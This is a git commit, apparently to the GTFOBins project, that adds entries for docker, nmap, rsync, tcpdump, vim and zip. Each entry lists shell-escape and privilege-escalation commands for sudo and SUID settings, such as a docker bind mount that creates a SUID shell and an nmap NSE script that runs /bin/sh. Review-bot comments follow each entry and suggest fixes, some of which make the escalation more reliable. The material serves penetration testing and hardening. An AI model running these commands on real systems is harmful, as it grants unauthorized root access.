Add: docker, nmap, rsync, tcpdump, vim and zip

Andrea Cardaci 2018-08-19 11:52:44 +02:00
commit edd7fec5ff
6 changed files with 97 additions and 0 deletions

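--- a/_gtfobins/docker.md
+++ b/_gtfobins/docker.md
+---
+description: |
+Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
+This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
+functions:
+execute-interactive:
+- code: |
+docker run --rm -v /home/$USER:/h_docs ubuntu \
+sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+sudo-enabled:
+- code: |
+sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
+sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+suid-enabled:
+- code: |
+./docker run --rm -v /home/$USER:/h_docs ubuntu \
+sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+---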
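Review bot: The trailing `~/sh -p` in all three variants relies on bash's privileged-mode flag, but `/bin/sh` copied out of the `ubuntu` image is dash, which as far as I can tell rejects `-p` as an illegal option (and, having no privileged mode, keeps the effective uid without it), so either drop `-p` or copy `/bin/bash` and keep it. The setuid bit on the copied shell is also silently ignored when the user's home directory sits on a `nosuid` mount, which deserves a one-line caveat in the description. The description additionally contradicts the command: the bind mount of `/home/$USER` places the file on the host, not "in the guest file system"; suggest `This creates a SUID shell on the host file system, inside the user's home directory.`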

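--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,18 @@
+---
+functions:
+execute-non-interactive:
+- description: Echoing of input characters3ers is disabled.
+code: |
+echo 'os.execute("/bin/sh")' > /tmp/script.nse
+nmap --script=/tmp/script.nse
+sudo-enabled:
+- description: Echoing of input characters3ers is disabled.
+code: |
+echo 'os.execute("/bin/sh")' > /tmp/script.nse
+sudo nmap --script=/tmp/script.nse
+suid-enabled:
+- description: Echoing of input characters3ers is disabled.
+code: |
+echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
+./nmap --script=/tmp/script.nse
+---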
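Review bot: All three variants write the NSE script to the fixed path `/tmp/script.nse`, which is predictable in a world-writable directory and lets another local user pre-create or symlink the name before the privileged `nmap` reads it; the tcpdump entry in this same commit already uses `mktemp`, so `TF=$(mktemp)` / `echo 'os.execute("/bin/sh")' > $TF` / `nmap --script=$TF` would be both safer and consistent. The `description` text `Echoing of input characters3ers is disabled.` is garbled in all three places and should read `Echoing of input characters is disabled.`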

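--- a/_gtfobins/rsync.md
+++ b/_gtfobins/rsync.md
@@ -0,0 +1,9 @@
+---
+functions:
+execute-interactive:
+- code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+sudo-enabled:
+- code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+suid-enabled:
+- code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+---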
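Review bot: In the `suid-enabled` variant the outer `bash -p -c` keeps the elevated effective uid, but the inner `sh -i` it hands off to is started without `-p`, so if `/bin/sh` is bash the final interactive shell resets its euid to the real uid and the privilege is lost. The other SUID entries in this commit pass `-p` to the shell the user actually lands in, so `./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -p -i"' 127.0.0.1:/dev/null` would be consistent. The fd rewiring is unexplained; a `description:` such as `The remote-shell command gets pipes to rsync on stdin/stdout, so they are saved and replaced with stderr (the terminal) before the interactive shell is started.` would save readers working it out (that reading is my inference from the redirections, worth confirming).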

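--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,17 @@
+---
+functions:
+execute-non-interactive:
+- code: |
+COMMAND='id > /tmp/output'
+TF=$(mktemp -u)
+echo "$COMMAND" > $TF
+chmod +x $TF
+tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+suid-enabled:
+- code: |
+COMMAND='id > /tmp/output'
+TF=$(mktemp -u)
+echo "$COMMAND" > $TF
+chmod +x $TF
+sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+---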
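Review bot: The second variant is keyed `suid-enabled` but its command is `sudo tcpdump ...`, so it is the sudo case under the wrong key; rename it to `sudo-enabled` as the other entries in this commit do, and add a real `./tcpdump` SUID variant only once it has been verified. Separately, distro builds of tcpdump that are configured to drop privileges after opening the capture run the `-z` post-rotate command as the unprivileged capture user, so the payload may execute as `tcpdump` rather than root unless `-Z root` is added; that is worth a hedged caveat in a `description:`. `TF=$(mktemp -u)` followed by `echo "$COMMAND" > $TF` also leaves a window in which another user can pre-create the path before it is written and executed; plain `TF=$(mktemp)` creates the file atomically.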

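--- a/_gtfobins/vim.md
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+execute-interactive:
+- code: vim -c ':!/bin/sh'
+- code: |
+vim
+:set shell=/bin/sh
+:shell
+file-write:
+- code: |
+vim file_to_write
+w
+file-read:
+- code: vim file_to_read
+suid-enabled:
+- code: ./vim -c ':!/bin/sh -p'
+sudo-enabled:
+- code: sudo vim -c ':!/bin/sh'
+---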
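Review bot: The `file-write` snippet runs `vim file_to_write` followed by a bare `w`, but in normal mode `w` is a word motion and writes nothing; the write command is `:w`, matching the `:`-prefixed commands the `execute-interactive` variant already uses. Showing where the content comes from would make the entry usable as written, e.g. `vim file_to_write` / `iDATA<Esc>` / `:w`. The key order here (`suid-enabled` before `sudo-enabled`) is reversed relative to every other file in this commit; swapping the two keeps the entries uniform.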

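--- a/_gtfobins/zip.md
+++ b/_gtfobins/zip.md
@@ -0,0 +1,15 @@
+---
+functions:
+execute-interactive:
+- code: |
+zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+rm /tmp/x.zip
+sudo-enabled:
+- code: |
+sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+sudo rm /tmp/x.zip
+suid-limited:
+- code: |
+./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+sudo rm /tmp/x.zip
+---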
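Review bot: In the `suid-limited` variant the cleanup line is `sudo rm /tmp/x.zip`, which presumes sudo in a scenario that by definition only offers a SUID binary, and because the archive is written by the privileged process into sticky `/tmp` the unprivileged user may be unable to delete it afterwards at all. If the shell spawned by `-TT` keeps the elevated uid, deleting the archive from inside that shell before exiting avoids the `sudo`; otherwise the entry should say the file is left behind. All three variants also use the predictable name `/tmp/x.zip`; `TF=$(mktemp -u)` as in the tcpdump entry would remove the fixed path and keep the commit consistent. The `suid-limited` key is the only one of its kind in this commit; if it is deliberate (presumably because the test command runs through a shell that drops the effective uid), a one-line `description:` stating the limitation would help readers.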